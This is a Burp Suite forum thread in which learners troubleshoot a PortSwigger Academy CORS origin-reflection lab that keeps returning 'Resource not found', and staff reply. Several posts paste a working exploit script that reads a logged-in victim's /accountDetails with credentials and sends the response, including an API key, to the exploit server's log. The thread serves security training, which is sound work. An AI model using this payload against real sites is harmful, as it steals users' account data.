Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Resource not Found Academy Exploit

Phoenix | Last updated: Dec 19, 2022 07:47AM UTC

When I try this academy https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack, I have facing problem /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 when view access log after deliver exploit to victim. I have follow the video solution from community in https://www.youtube.com/watch?v=XTFDst3TjMM&t=7s Can you help me?

Liam, PortSwigger Agent | Last updated: Dec 19, 2022 02:11PM UTC

Thanks for your message, Phoenix. Are you still encountering this issue?

Christopher | Last updated: Jan 08, 2023 09:55AM UTC

i have same exact problem, all settings is correctly to the official solution, i'm unable to complete this lab

Christopher | Last updated: Jan 08, 2023 10:27AM UTC

After send the exploit to victim a couple of times the exploit works. So i guess there' just a delay/lag

Liam, PortSwigger Agent | Last updated: Jan 09, 2023 08:05AM UTC

Thanks for letting us know, Christopher.

Vanessa | Last updated: Feb 23, 2023 12:52PM UTC

I have the same problem. It does not work for me even after multiple retries. Is there any solution to this? Thanks in advance

Ben, PortSwigger Agent | Last updated: Feb 24, 2023 07:59AM UTC

Hi Vanessa, Are you able to share the script that you have configured in the Exploit Server?

nekov | Last updated: Mar 17, 2023 05:33AM UTC

Even I'm facing the same issue after several attempts.

Ben, PortSwigger Agent | Last updated: Mar 17, 2023 10:47AM UTC

Hi Nekov, Are you able to provide us with details of what you have configured in your Exploit Server? For the 'req.open' part of the script, are you including the protocol in the URL, so something like: req.open('get','https://0a3a007b036d6777c0001dbd000e00e7.web-security-academy.net/accountDetails',true);

Diptangsu | Last updated: Nov 15, 2023 06:57PM UTC

I am facing the exact same issue and am unable to solve the lab

Ben, PortSwigger Agent | Last updated: Nov 16, 2023 01:26PM UTC

Hi Diptangsu, Are you able to provide us with some details of the steps that you are using to try and solve this particular lab so we can see exactly what you are doing?

iman | Last updated: Mar 03, 2024 08:00PM UTC

I am facing the exact same issue and am unable to solve the lab I Use this script: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> and in access log, "/log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22" show.

Ben, PortSwigger Agent | Last updated: Mar 04, 2024 08:40AM UTC

Hi Iman, I have just run through this lab and been able to solve it using the solution provided so it does appear to be functioning as expected. I assume that this is the case but have you entered your actual lab URL within the exploit i.e. req.open('get','https://0a6800ce04c284f58c4b8e14000f0063.web-security-academy.net/accountDetails',true); In addition to the above, have you logged into your account before configuring and delivering your exploit?

Joseph | Last updated: Mar 28, 2024 02:19AM UTC

i was able to spot the issue, basically it fails due to CORS policy not authorizing a different domain lol, so what i did is to add the same domain in the HTTP request as origin, <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get', 'https://0a9a00ed031ace4d80fd0d7200c200d3.web-security-academy.net/accountDetails', true); req.withCredentials = true; // Adding Origin header req.setRequestHeader('Origin', window.location.origin); req.send(); function reqListener() { location = '/log?key=' + this.responseText; }; </script> this way you can send thee exploit and trick the server, get your api key :)

Ved | Last updated: Jun 13, 2024 04:28AM UTC

Solved - Issue : Resource not found in URL Solution : add https:// before Lab ID as : req.open('get',https://'YOUR-LAB-ID.web-security-academy.net/accountDetails',true);

bikram | Last updated: Jun 25, 2024 10:25AM UTC

I think this issue is happening with few lab IDs, I was facing the same issue (Resource not found). Facing the issues in apprentice labs, So I skipped the 1st two labs (was facing resource not found issue) and solved the PRACTITIONER lab. and after that when I again checked the APPRENTICE lab I was able to solve the lap (Following the same process). My suggestion will be 1st solve the PRACTITIONER lab then the APPRENTICE lab.

Ben, PortSwigger Agent | Last updated: Jun 25, 2024 10:34AM UTC

Hi, The labs are totally independent of one another so the order in which you do them should be irrelevant. The likely cause is what Ved mentioned in the post above - that the protocol has not been supplied in the exploit.

Rishi | Last updated: Jul 03, 2024 12:18PM UTC

I've done what VED has mentioned but still I'm facing this problem not with just this one but with Clickjacking labs also, resouce not found error. script of this lab exploit - <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a93007a04841b07826afc7b00e400e8.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> I've modified it with using https:// like ved said as you can see above but it doesn't help me out.

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 12:48PM UTC

Hi Rishi, Which browser are you using when you attempt this particular lab?

Sabari | Last updated: Jul 23, 2024 12:50PM UTC

The same issue I'm facing too In log: /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 my exploit: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','0a9e00e304b9e49285f85ece00c20069.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.setRequestHeader('Origin', window.location.origin); req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> even if i add https:// before the lab id, the exploit is not working and the redirection to /log doesn't happen(gets stuck in /exploit).

Ben, PortSwigger Agent | Last updated: Jul 23, 2024 01:00PM UTC

Hi, Which browser are you using?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.